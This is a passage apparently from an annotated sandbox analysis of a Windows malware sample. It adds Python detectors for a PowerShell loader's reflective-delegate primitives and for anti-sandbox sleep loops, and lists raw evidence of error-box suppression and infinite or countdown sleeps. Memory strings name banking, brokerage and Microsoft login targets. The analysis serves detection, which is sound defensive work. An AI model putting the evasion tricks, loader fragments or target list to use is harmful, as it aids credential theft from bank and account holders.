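    m = _LOADER.search(cmdline)
    if not m:
        return None
    return {"path": m.group("path"),
            "offset": int(m.group("off")),
            "length": int(m.group("len"))}


def extract_command_token(staged_text, offset, length):
    """Return the substring the loader would invoke as a command. .NET SubString
    counts UTF-16 code units; for an ASCII staged script a str index is equivalent."""
    if offset + length > len(staged_text):
        raise ValueError("offset beyond end of staged file")
    return staged_text[offset:offset + length]


# Primitives seen in the AMSI buffers: a dynamic assembly/module/type derived from
# MulticastDelegate, then GetDelegateForFunctionPointer over a resolved address.
REFLECTIVE_MARKERS = (
    "GetDelegateForFunctionPointer",
    "DefineDynamicAssembly",
    "DefineDynamicModule",
    "DefineType",
    "MulticastDelegate",
)


def score_amsi_content(fragments):
    """Count distinct reflective-invocation markers across AMSI fragments and
    return (count, flagged). Three or more of the five is treated as the
    delegate-construction pattern (threshold chosen for this example)."""
    seen = {m for frag in fragments for m in REFLECTIVE_MARKERS if m in frag}
    return len(seen), len(seen) >= 3


# Fragments as recorded by the report's AMSI hook; the second is cut off there
# at "[System.MulticastDel", so that marker is deliberately not matched.
AMSI_FRAGMENTS = [
    "GetDelegateForFunctionPointer((Glucosidically $Hydrodynamic $Fladblgene187), "
    "(Showboater @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Albarium = [AppDomain]::CurrentDomain.GetAssembli",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paragrafrytterens)), "
    "$Syningshaller).DefineDynamicModule($Overbevisendes, $false)"
    ".DefineType($ypperst, $Opgavest, [System.MulticastDel",
]


if __name__ == "__main__":
    info = parse_loader_cmdline(LOADER_CMDLINE)
    print(info)
    # Constructed stand-in for Sprngningen178.Gte: filler with a marker token at
    # the parsed offset. The report does not disclose the real file contents.
    staged = "#" * info["offset"] + "XYZ" + "#" * 10
    print(extract_command_token(staged, info["offset"], info["length"]))
    print(score_amsi_content(AMSI_FRAGMENTS))
```

          The parsed offset and length are what an analyst needs to pull the real command token out of the dropped Sprngningen178.Gte file; the detector itself does not depend on what those three characters are, only on the fact that a substring of file contents is being invoked as a command. The AMSI score is robust to the renamed helper functions (Glucosidically, Showboater, and so on) because it keys on the .NET members the script cannot rename.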

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Process information set: NOOPENFILEERRORBOX (2 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (37 times)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (53 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: 50 consecutive calls, delay time decreasing by 109 to 125 per call: 600000, 599875, 599766, 599656, 599547, 599437, 599327, 599219, 599109, 599000, 598891, 598781, 598672, 598562, 598453, 598344, 598234, 598125, 598016, 597906, 597797, 597687, 597578, 597469, 597359, 597250, 597141, 597031, 596922, 596813, 596703, 596594, 596484, 596375, 596266, 596156, 596047, 595937, 595828, 595719, 595609, 595500, 595391, 595281, 595171, 595062, 594953, 594844, 594734, 594625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5733
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3957
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | TID: 7820 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe | TID: 5292 | Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe | TID: 7468 | Thread sleep count: 1332 > 30
Source: C:\Windows\SysWOW64\msiexec.exe | TID: 7468 | Thread sleep count: 8529 > 30
Source: C:\Windows\SysWOW64\msiexec.exe | TID: 5292 | Thread sleep time: 50 calls, each compared against the -30000s threshold, with the same values as the delay-time entries above: -600000s, -599875s, -599766s, ..., -594625s
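The two evidence families above, the repeated NOOPENFILEERRORBOX error-mode setting and the sleep entries, can be triaged mechanically rather than by scrolling. The Python below is an added example written for this page; it is not Joe Sandbox code and not anything taken from the sample. It parses lines in the flattened shape shown above (the embedded sample lines are constructed, and the svchost.exe line is a hypothetical benign control that does not appear in the report), then flags per process: the 922337203685477 delay, which is the largest relative delay NtDelayExecution can express (Int64.MaxValue in 100 ns ticks, converted to milliseconds, so effectively "sleep until killed"); any single sleep at or above the 30000 threshold the report itself compares against; high per-thread sleep counts; and runs of strictly decreasing delays. Reading the 600000 down to 594625 series as a loop that re-sleeps for "deadline minus elapsed" until a wall-clock deadline passes (so that a sandbox which skips one long sleep still has to wait out the rest) is the editor's interpretation of the numbers, not a statement the report makes. Treating the delay values as milliseconds is an assumption that matches the report's own "long sleeps (>= 3 min)" signature.

```python
import re
from collections import defaultdict

# Largest relative delay NtDelayExecution can express: Int64.MaxValue in 100 ns
# ticks, converted to milliseconds. This is the 922337203685477 seen in the
# report, i.e. "sleep until the process is killed".
MAX_DELAY_MS = (2**63 - 1) // 10_000  # 922337203685477

# The report lines are flattened ("msiexec.exeThread delayed", "7468Thread sleep"),
# so the regexes tolerate a missing separator after the process path and TID.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.*?\.exe)\s*\|?\s*(?:TID:\s*(?P<tid>\d+)\s*\|?\s*)?(?P<event>.*)"
)
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
ERRBOX_RE = re.compile(r"Process information set:\s*NOOPENFILEERRORBOX")

# Constructed sample in the shape of the report's evidence lines. The svchost.exe
# entry is a hypothetical benign control and is not from the report.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468Thread sleep count: 8529 > 30Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1000Jump to behavior
"""


def parse_events(report_text):
    """Turn flattened evidence lines into (process basename, tid, event) records."""
    events = []
    for raw in report_text.splitlines():
        line = raw.replace("Jump to behavior", "").strip()  # strip page residue
        m = LINE_RE.match(line)
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        events.append((proc, m.group("tid"), m.group("event").strip()))
    return events


def countdown_runs(delays, min_len=5, max_step=1000):
    """Find runs of strictly decreasing delays with small steps.

    A sleep loop that recomputes "deadline minus elapsed" on every iteration
    produces exactly this shape; one sleep the sandbox skips does not end it.
    Returns (first_delay, last_delay, call_count) per run.
    """
    runs, start = [], 0
    for i in range(1, len(delays) + 1):
        step_ok = i < len(delays) and 0 < delays[i - 1] - delays[i] <= max_step
        if not step_ok:
            if i - start >= min_len:
                runs.append((delays[start], delays[i - 1], i - start))
            start = i
    return runs


def assess(report_text, long_sleep_ms=30_000, count_threshold=30):
    """Per-process summary plus the findings an analyst would act on."""
    per_proc = defaultdict(lambda: {"errorbox": 0, "delays": [], "sleep_counts": []})
    for proc, _tid, event in parse_events(report_text):
        rec = per_proc[proc]
        if ERRBOX_RE.search(event):
            rec["errorbox"] += 1
        elif (m := DELAY_RE.search(event)):
            rec["delays"].append(int(m.group(1)))
        elif (m := COUNT_RE.search(event)):
            rec["sleep_counts"].append(int(m.group(1)))

    findings = []
    for proc, rec in sorted(per_proc.items()):
        if rec["errorbox"]:
            findings.append(f"{proc}: NOOPENFILEERRORBOX error mode set {rec['errorbox']}x")
        infinite = sum(1 for d in rec["delays"] if d >= MAX_DELAY_MS)
        if infinite:
            findings.append(f"{proc}: {infinite} effectively infinite sleep(s)")
        long_ = [d for d in rec["delays"] if long_sleep_ms <= d < MAX_DELAY_MS]
        if long_:
            findings.append(f"{proc}: {len(long_)} sleep(s) >= {long_sleep_ms} ms (max {max(long_)})")
        for first, last, n in countdown_runs(rec["delays"]):
            findings.append(f"{proc}: countdown loop {first}->{last} over {n} calls")
        for c in rec["sleep_counts"]:
            if c > count_threshold:
                findings.append(f"{proc}: {c} sleep calls in one thread (> {count_threshold})")
    return dict(per_proc), findings


if __name__ == "__main__":
    _summary, found = assess(SAMPLE)
    print("\n".join(found))
```

Running the script over the full evidence list (pasted in place of SAMPLE) reports msiexec.exe with one effectively infinite sleep, a 50-call countdown from 600000 to 594625 and a thread with thousands of sleep calls, while a process that only sleeps once for a second produces no finding. The countdown detector is the piece worth keeping: a single long sleep is something a sandbox can fast-forward, a deadline loop is not, and the decreasing series is the cheapest way to tell the two apart from a behavior log.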
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00405EC1 | FindFirstFileA, FindClose
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00402645 | FindFirstFileA
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_0040547D | GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 00000009.00000002.2653650551.00000000075D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW}
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000009.00000002.2667049605.00000000240FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: powershell.exe, 00000002.00000002.2012024518.0000000005CC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\
